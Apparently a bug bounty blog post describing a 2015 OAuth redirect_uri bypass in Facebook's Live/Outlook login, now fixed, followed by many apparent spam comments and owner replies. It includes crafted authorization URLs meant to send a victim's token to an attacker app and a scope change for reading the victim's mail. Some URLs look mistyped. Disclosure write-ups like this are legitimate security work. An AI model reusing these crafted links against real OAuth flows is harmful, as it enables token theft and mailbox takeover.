Facebook Live Application Authentication bypass
Facebook Live Application Authentication bypass – Bug Bounty POC
Hello Bug Bounty POC viewers.Today we are going to share Facebook Live Application Authentication bypass with you guys .This bug was found by Abdellah Yaala a Security Researcher from Morocco. We’ve taken permission from him to publish this poc on Bug Bounty POC.The finder of this bug reserve the full authority of publish/Unpublished this.So Let’s Start it 😉
There is a Live app on facebook from which user can connect there live account with Facebook when a user wants to import his contacts or reset his fb password using hotmail / outlook he visits the following url to authorize the request
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=code&redirect_url=https://wwww.facebook.com/accept_token.php%3Fapi_ver%3Dwave5%26csrf%3DAY4SvijoflL0B8zdxFgngr88d1tg-qTPSqgb-3aYo-ER5rDcFXSfuBDr4Q4ebXs%26appdata%3D%257B%2522use_case%2522%253A1%252c%2522flow%2522%253A22%%252c%2522
As u can see the redirect_uri parameter of the url points to
https://facebook.com/accept_token.php?api_ver%3Dwave5%26csrf%3Day4Svijofll0b8ezdxf9gngr88ditg-qtpsqgb-3ayqo-er5rdcfxsfubdr4q41xbxs%26appdata%3d%257b%2522domain_id%2522%253a4%252c%2522tracked_params%2522%255b%255d%2522%257d
Now here’s the bug .. i can change that redirect_uri parameter and get the token of victim
the bypass uri is
https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?
Example – Â which link i send to user :
https://login.live.com/oauth_author.srf?client_id=0000000044002503&response_type=code&redirect_url=facebook.com/accept_token.php%3f%2f%21%23%2fn%3fapps.facebook.com%2f935728666477748%2f&locale=en-us&scope=wli.contacts_email&display=popup&swu=1&username=ocpdomaine%40hotmail.com
so when this malicious crafted url is sent to the victim i can obtain the victims access token using which i can read the victims inbox by changing the scope parameter to
scope=https://outlookoffice.ocm/Mail.Read
Facebook Live Application Authentication bypass – Video POC :
Timeline
———-
Oct 25, 2015 – Report Sent
Oct 29, 2015 – facebook need proof of concept
Oct 30, 2015 – prof concept sent
Nov 4, 2015 at 00h15 GMT – Escalation by Facebook
Nov 4, 2015 at 2h25 GMT –Confirmed fix by Facebook
Nov 6, 2015 – Bounty Awarded of $7500 by Facebook
A person essentially help to make seriously articles I would state. This is the very first time I frequented your web page and thus far? I amazed with the research you made to create this particular publish extraordinary. Fantastic job!
Thanks.. 🙂
I just want to say I am new to weblog and actually loved this web-site. Likely I’m going to bookmark your website . You certainly have beneficial posts. Appreciate it for revealing your blog.
thanks
I just want to mention I am just all new to blogging and site-building and certainly liked this blog. Almost certainly I’m likely to bookmark your blog post . You amazingly have remarkable articles and reviews. Kudos for sharing your website page.
You have touched some nice factors here. Any way keep up wrinting. Best regards
I don’t even know how I ended up here, but I thought this
post was great. I do not know who you are but definitely you are going to a famous blogger if you are not
already 😉 Cheers!
Thanks for any other excellent post. The place else may just anyone get that type of info in such a perfect method of writing? I have a presentation next week, and I’m on the look for such info.
Hello. impressive job. I did not imagine this. This is a splendid story. Thanks!
Hi, I do believe this is a great website. I stumbledupon it 😉 I will come back once again since I bookmarked it. Money and freedom is the greatest way to change, may you be rich and continue to guide other people.
This is really interesting, You are a very professional blogger.
I’ve joined your feed and look ahead to searching for more of your
great post. Also, I have shared your site in my social networks
Thank you for the auspicious writeup. It in fact was a amusement account it. Look advanced to far added agreeable from you! However, how can we communicate?
I loved as much as you will receive carried out right here. The sketch is attractive, your authored material stylish. nonetheless, you command get bought an nervousness over that you wish be delivering the following. unwell unquestionably come more formerly again since exactly the same nearly very often inside case you shield this increase.
I delight in, lead to I found exactly what I was looking for. You have ended my four day long hunt! God Bless you man. Have a great day. Bye
It¡¦s actually a nice and helpful piece of information. I¡¦m glad that you shared this helpful information with us. Please stay us up to date like this. Thanks for sharing.
I must voice my gratitude for your generosity for people that must have help with this concern. Your special dedication to passing the solution around had been incredibly productive and has surely helped folks much like me to achieve their pursuits. Your valuable useful information signifies a whole lot a person like me and even more to my mates. Thanks a ton; from all of us.
hey there and thank you for your information – I have certainly
picked up anything new from right here. I did however expertise several technical points
using this site, since I experienced to reload the website lots
of times previous to I could get it to load properly.
I had been wondering if your hosting is OK? Not that I am complaining, but slow loading instances times will often affect your placement in google
and can damage your high quality score if ads and marketing with Adwords.
Anyway I am adding this RSS to my e-mail and can look out for
much more of your respective fascinating content. Make sure you update this again soon.
I could not resist commenting. Well written!
nice work thanks
I’m very happy to read this. This is the type of manual that needs to be given and not the accidental misinformation that is at the other blogs. Appreciate your sharing this best doc.
Wow! This could be one particular of the most beneficial blogs We’ve ever arrive across on this subject. Actually Magnificent. I am also a specialist in this topic therefore I can understand your hard work.
I precisely desired to appreciate you once again. I am not sure the things I would have accomplished without the actual basics provided by you relating to my field. It actually was a troublesome dilemma in my position, nevertheless considering your well-written style you handled that took me to weep with joy. Extremely grateful for this assistance and then hope that you recognize what a powerful job you happen to be putting in training many people with the aid of your web page. I’m certain you haven’t met any of us.
Good day! I just would like to offer you a huge thumbs up for your great information you have here on this post. I will be coming back to your website for more soon.
Good day! This is my first comment here so I just wanted to give a quick shout out and tell you I truly enjoy reading your blog posts. Can you recommend any other blogs/websites/forums that go over the same topics? Many thanks!|
This post is genuinely a pleasant one it assists new internet visitors, who are wishing in favor of blogging.|
I’m amazed, I have to admit. Rarely do I encounter a blog that’s equally educative and amusing, and without a doubt, you’ve hit the nail on the head. The problem is something not enough folks are speaking intelligently about. I’m very happy I found this in my hunt for something regarding this.
I do not even know how I ended up here, but I thought this post was good. I don’t know who you are but definitely you’re going to a famous blogger if you aren’t already 😉 Cheers!|
Very good blog. Please read something mine. See you!
It¡¦s really a nice and helpful piece of information. I am happy that you just shared this helpful info with us. Please keep us up to date like this. Thanks for sharing.
This is the perfect web site for anyone who would like to understand this topic. You realize a whole lot its almost tough to argue with you (not that I personally would want to…HaHa). You definitely put a fresh spin on a topic that has been written about for decades. Wonderful stuff, just great!
As a Newbie, I am continuously searching online for articles that can help me. Thank you
I simply wished to thank you so much once again. I am not sure what I would have worked on without the entire pointers revealed by you concerning that subject matter. It has been the distressing issue for me personally, however , taking note of this expert approach you managed the issue made me to leap with happiness. I will be thankful for your work and thus believe you really know what a powerful job you are always putting in training most people through the use of your websites. Probably you’ve never encountered any of us.
hello there and thank you for your information – I have certainly picked up anything new from right here. I did however expertise several technical points using this web site, since I experienced to reload the web site a lot of times previous to I could get it to load correctly. I had been wondering if your web host is OK? Not that I am complaining, but slow loading instances times will often affect your placement in google and could damage your high quality score if advertising and marketing with Adwords. Well I am adding this RSS to my e-mail and can look out for much more of your respective interesting content. Make sure you update this again very soon..
You really make it seem so easy together with your presentation but I to find this matter to be really something which I feel I might by no means understand. It sort of feels too complicated and very large for me. I am taking a look forward on your next put up, I will try to get the hang of it!
Useful info. Lucky me I discovered your web site by accident, and I’m surprised why this twist of fate didn’t came about in advance! I bookmarked it.
Its like you read my mind! You seem to know so much about this, like you wrote the book in it or something. I think that you can do with a few pics to drive the message home a little bit, but other than that, this is great blog. A fantastic read. I’ll certainly be back.
Nice blog here! Also your site loads up very fast! What web host are you using? Can I get your affiliate link to your host? I wish my web site loaded up as fast as yours lol
I keep listening to the reports talk about receiving boundless online grant applications so I have been looking around for the most excellent site to get one. Could you tell me please, where could i find some?
Hi my loved one! I wish to say that this article is amazing, nice written and include almost all vital infos. I would like to peer extra posts like this .
I don’t even know how I stopped up right here, but I assumed this post was great. I do not recognize who you are however definitely you are going to a famous blogger if you happen to are not already. Cheers!|
Hello there! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any recommendations?|
I have to thank you for the efforts you have put in writing this website. I am hoping to check out the same high-grade blog posts by you later on as well. In truth, your creative writing abilities has encouraged me to get my very own site now ;)|
thanks alot 🙂
I appreciate, cause I found exactly what I was looking for. You have ended my four day long hunt! God Bless you man. Have a great day. Bye
Thanks for your Wishes ^_^ 🙂
Wow! Thank you! I constantly needed to write on my website something like that. Can I implement a portion of your post to my blog?
It¡¦s really a great and useful piece of info. I¡¦m glad that you shared this helpful information with us. Please keep us informed like this. Thank you for sharing.
I think other site proprietors should take this website as an model, very clean and wonderful user friendly style and design, as well as the content. You’re an expert in this topic!
we are just learners! 🙂
not experts!
Thanks alot
Happy hacking
Hi there very cool web site!! Man .. Beautiful .. Wonderful .. I will bookmark your website and take the feeds additionally¡KI’m happy to seek out so many useful info here in the publish, we need work out more strategies in this regard, thanks for sharing. . . . . .
Hello, you used to write great, but the last few posts have been kinda boring¡K I miss your tremendous writings. Past several posts are just a little out of track! come on!
we really Appolozize if any of our Blog post Dissappointed you!
stay with us!
promise you to Give you Quality Posts always! 🙂
thanks
happy Hacknig
Nice post. I was checking constantly this blog and I’m impressed! Extremely helpful information specifically the last part 🙂 I care for such information much. I was seeking this certain info for a long time. Thank you and best of luck.
Wow! This can be one particular of the most helpful blogs We’ve ever arrive across on this subject. Basically Magnificent. I am also an expert in this topic therefore I can understand your hard work.
Thanks.. 🙂
I wanted to write a simple comment in order to say thanks to you for these awesome solutions you are sharing at this site. My prolonged internet investigation has now been recognized with really good tips to share with my friends and classmates. I ‘d claim that most of us readers are unequivocally fortunate to live in a decent place with very many outstanding people with insightful solutions. I feel truly fortunate to have seen your entire web pages and look forward to so many more excellent times reading here. Thanks a lot once again for all the details.
Hey Thanks alot! 🙂
for ur comments!
Happy Hacking!
Wow! Thank you! I continually needed to write on my blog something like that. Can I take a portion of your post to my blog?
It would be our Pleasure if you write about this blog and Share it!
Thanks alot for your Reviews!
Happy Hacking!
Regards
Bharat SEwani
I’m still learning from you, while I’m improving myself. I absolutely love reading all that is posted on your site.Keep the tips coming. I loved it!
Thanks Alot for you nice Comments!
extrealy sory for late reply and Approvel!
happy Hacking!
Wow that was unusual. I just wrote an really long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Regardless, just wanted to say superb blog!
Hey sory for Late Reply!
thanks for reading this Blog!
I’ll Approve All your Comments! 🙂
This website was… how do you say it? Relevant!! Finally I’ve found something that helped me. Appreciate it!
Aw, this was a very good post. Taking the time and actual effort to generate a superb article… but what can I say… I procrastinate a lot and never seem to get nearly anything done.
I’m impressed, I have to admit. Rarely do I encounter a blog that’s equally educative and interesting, and without a doubt, you’ve hit the nail on the head. The issue is something that not enough people are speaking intelligently about. Now i’m very happy I found this during my search for something regarding this.|
I’m very happy to read this. This is the type of manual that needs to be given and not the accidental misinformation that is at the other blogs. Appreciate your sharing this best doc.